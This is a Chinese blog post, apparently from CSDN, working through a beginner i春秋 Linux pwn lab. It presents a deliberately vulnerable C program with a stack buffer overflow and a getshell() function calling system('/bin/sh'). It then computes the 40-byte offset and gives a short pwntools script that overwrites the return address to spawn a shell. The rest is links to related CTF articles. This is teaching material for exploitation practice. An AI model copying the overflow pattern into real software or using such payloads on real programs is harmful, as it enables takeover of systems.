i春秋-Linux pwn 入门

最新推荐文章于 2024-07-25 08:36:21 发布
最新推荐文章于 2024-07-25 08:36:21 发布
阅读量1.1k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liminglei960316/article/details/81068298
版权

一环境准备(64位)

                    目标代码:与i春秋上有一点点区别,不同处标黄。

                        #include <stdio.h>

                            int hello()

                                {

                                       int buf;

                                        int v2;

                                    __int128 v3;

                                    buf=0;

                                    v2=0;

                                    v3=0;

                                    read(0,&buf,0x64u);

                                        return printf("hello\n,%ls",&buf);

                                        }

                                    int getshell()

                                    {

                                        return system("/bin/sh");

                                        }

                                        int main(void)

                                                    {

                                                hello();

                                                return 0;

                                                    }

                              通过gcc 命令生成elf文件、

                        调试环境:IDA 远程调试,连接到ubuntu。即可在Windows下动态调试elf文件。上手后决的不是很好用。在ubuntu里安装了edb-debug。

二溢出位置计算

        左图是对栈的初始化,右图是初始化后的栈帧。

 

对栈进行分析: ........70为buf开始地址,98为函数返回地址,000055b7:67e8f7c8是shell函数地址

98-70=28h

playload=40个字符+目标地址

三获取权限

在edb中对内存的修改不好用,转到ida中进行提权的修改。

首先根据在edb中动态调试的分析对hello return 值手工修改让其返回到getshell处

 

单步调试,分析程序流。跳转到getshell内部

在CALL _SYSTEM处报错,暂时还没解决。

(2)通过playload 返回shell

漏洞利用代码:

                        from pwn import *

                        p = process('./icq')

                        shell = 0x00000000000007B8

                        payload = 'A'*40 +p64(shell)

                        p.send(payload)

                        p.interactive()

返回shell

 

liminglei960316
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python安装pwn_Linux pwn入门教程(0)——环境配置
weixin_34413579的博客
02-10 871
作者:Tangerine@SAINTSEC0x00前言作为一个毕业一年多的辣鸡CTF选手,一直苦于pwn题目的入门难,入了门更难的问题。本来网上关于pwn的资料就比较零散,而且经常会碰到师傅们堪比解题过程略的writeup和没有注释,存在大量硬编码偏移的脚本,还有练习题目难找,调试环境难搭建,GDB没有IDA好操作等等问题。作为一个老萌新(雾),决定依据Atum师傅在i春秋上的pwn入门课程中的技...
Linux pwn入门教程(0)——环境配置
xiaoi123的博客
07-02 3548
作者:Tangerine@SAINTSEC0×00前言作为一个毕业一年多的辣鸡CTF选手,一直苦于pwn题目的入门难,入了门更难的问题。本来网上关于pwn的资料就比较零散,而且经常会碰到师傅们堪比解题过程略的writeup和没有注释,存在大量硬编码偏移的脚本,还有练习题目难找,调试环境难搭建,GDB没有IDA好操作等等问题。作为一个老萌新(雾),决定依据Atum师傅在i春秋上的pwn入门课程中的技...
i春秋linux-pwn入门教程
Sakura给爷pwn全场
12-03 353
https://www.cnblogs.com/ichunqiu/p/11583552.html
【二进制安全】PWN基础入门大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
leah126的博客
07-25 2038
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
i春秋上的几道pwn
sopora的博客
06-17 1753
01.pwnme-50: Tag: fmtstr任意读 / 整型溢出 / ret2csu_init #encoding:utf-8 from pwn import * #context.log_level = 'debug' def leak(addr): io.sendafter('>', '2') io.sendafter('username...
CTF PWN之heap入门 unlink
L2329794714的博客
09-09 1702
unlink的利用需要申请连续的chunk,为了方便我们先要让IO两个缓冲区都申请了,即程序执行至少以此IO输出,一次IO此输入(这里可以让程序执行一遍创建堆块的流程实现),后面再创建两个相邻的堆块,后面一个大小大于0x80,再前一个堆块里伪造一个释放状态的chunk,并利用堆溢出改写后一个chunk的P_size(伪造chunk的大小包括chunk头),和size(in_user为为0),然后free后面的chunk来触发前合并,从而进行unlink。P:为要取出的chunk指针(指向chunk头的)
2021春秋pwn题目大解析
MachineGunJoe666
07-03 899
目录 dou_like_pwn libc 漏洞 思路 exp 双边协议@1.5 程序分析 漏洞 思路 EXP dou_like_pwn libc 2.27的libc ld在这里下载 http://archlinux.arkena.net/archive/packages/a/aarch64-linux-gnu-glibc/ 漏洞 功能2只检查了a1<=2, a1可以是负数, 因此产生越界 思路 PtrArr前面一个回环指针 先Read2B修改..
i春秋半月刊 - 安全技术资料汇总(共7份).zip
02-06
3. **Linux Pwn零基础入门教程**(i春秋月刊第六期—Linux_pwn零基础入门教程全套.pdf) Linux Pwn通常指的是在Linux环境中进行溢出攻击,这份教程可能是针对初学者设计的,涵盖堆栈溢出、格式字符串漏洞、内存管理...
CTF从入门到提升
anquanniu的博客
07-10 5482
CTF选手的操作都是像吴白那么帅嘛?如何入门CTF比赛,一篇经验带你入门。 CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球大会,以代替之前们通过互相发起真实***进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式。 入门CTF的内容会从CTF中WEB...
Ichunqiu_Easypwn
钞sir的博客
01-28 4031
轮回池前彼岸花 三生石旁那道疤 擦不去的眼中莎 泪眼迷离失去她 https://cc-sir.github.io/2019/01/28/ichunqiu_easypwn/ 方法 这道题是i春秋CTF的一道题,也是“百度杯”CTF比赛 十二月场中的一道pwn,这道题比较简单 我们先看看这道题的保护机制: sir@sir-PC:~/desktop$ checksec easypwn [*] '/ho...
i春秋2020新春公益赛部分WP
qq_41252520的博客
02-24 1032
文章目录0x0 easyRsa0x1 Easy_Rsaweb0x0 ezuploadReverse0x0 EasyVMpwn0x0 Some_thing_exceting0x1 Some_thing_interesting0x2 BorrowStack总结 #Crypto 0x0 easyRsa n = 27560959918385616419486273009594513460044316476...
8.pwn入门新手学堆详细笔记
qiudalaojiao的博客
02-21 925
这几天打算跟着wiki学习 就自己练习了一下 然后写到自己的csdn重复的记 哎 菜鸡的求生之路 题目网址 rop简介 很多程序开了nx保护,所以我们要通过rop 主要思想是在栈缓冲区的基础上 利用程序中已有的gadgets来改变某些寄存器或者变量的值,从而控制程序的执行流程 gadgets就是 以ret结尾的指令序列,通过这些指令序列 我们可以修改某些地址的内容,方便控制程序的之执行流程 ro...
【Writeup】i春秋 Linux Pwn 入门教程_EasyCTF 2017-doubly_dangerous
BAKUMANSEC - Just Do It
08-20 800
Linux pwn入门教程(1)——栈溢出基础 0x01 解题思路 查看文件信息并试运行 ​ 开启了NX,栈上无法执行代码。 拖入IDA 32bits,F5查看 ​ main 显然存在栈溢出漏洞,目前存在两种思路: 覆盖RIP为give_flag地址,执行give_flag函数 覆盖v5的值为11.28125,使其通过判断执行give_flag函数 通过尝试发现,按...
(已弃坑,请看i春秋月刊 Linux pwn入门,地址见文章)鬼哥手把手带你入门栈溢出(0):了解基本原理
su1yu4n's Blog
01-13 530
目录 基础知识准备 汇编基础 C语言 gdb-peda调试 -------------------------正文从这里开始------------------------- 了解函数的栈帧布局、调用及返回过程 编码 调试(可跳过看总结,建议自行调试加深理解) 总结 栈溢出原理 基础知识准备 汇编基础 首先要对汇编有一定基础,下面的,尤其加粗部分必须懂(其他的遇到了...
360chunqiu2017_smallest —— 从例题理解SROP
Tokameine的博客
08-29 1305
前言: 本篇博客为个人学习过程中的理解,仅记录个人理解,WIKI写的要比本篇详细得多。若与其存在矛盾,请以WIKI为准,也感谢读者指出问题。 正文: SROP(Sigreturn Oriented Programming),与常规ROP的区别在于通过sigreturn函数来进行返回而不是retn指令 这里引用WIKI中对Signal机制的介绍: Signal 机制¶ Signal 机制是类 unix 系统中进程之间相互传递信息的一...
i春秋2020新春战役PWN之BFnote (修改TLS结构来bypass canary)
seaaseesa的博客
02-24 2209
BFnote 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 一开始处,有一个栈溢出漏洞,但是由于开启了canary保护,得想办法绕过canary。下方的堆溢出,不仔细看还发现不了,v4只有一开始被初始化,在循环里,只有i被重新赋值,v4没变,而下方又用到了v4。 这题是可以绕过canary的,这就牵涉到了一个知识点。 在linux下,有一种线程局部存储(Thread ...
Linux pwn入门教程,i春秋linux_pwn入门教程复现之栈溢出基础
weixin_35709851的博客
05-02 245
i春秋linux_pwn入门教程复现之栈溢出基础演示进程总览1:main函数2:hello函数3:getShell函数函数的入栈和出栈1:F2断点于call hello启动IDA远程调试F9运行EIP=0x080484D9,保存着下一条将要执行的命令、ESP=0xFF80EA90,保存着栈顶地址、EBP=0xFF80EA98,保存着栈底地址。2:验证EIP始终指向下一条将要执行的命令:修改EIP的...
高级ROP
听鬼哥说故事
08-29 4957
高级ROP其实和一般的ROP基本一样,其主要的区别在于它利用了一些比较有意思的gadgets。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值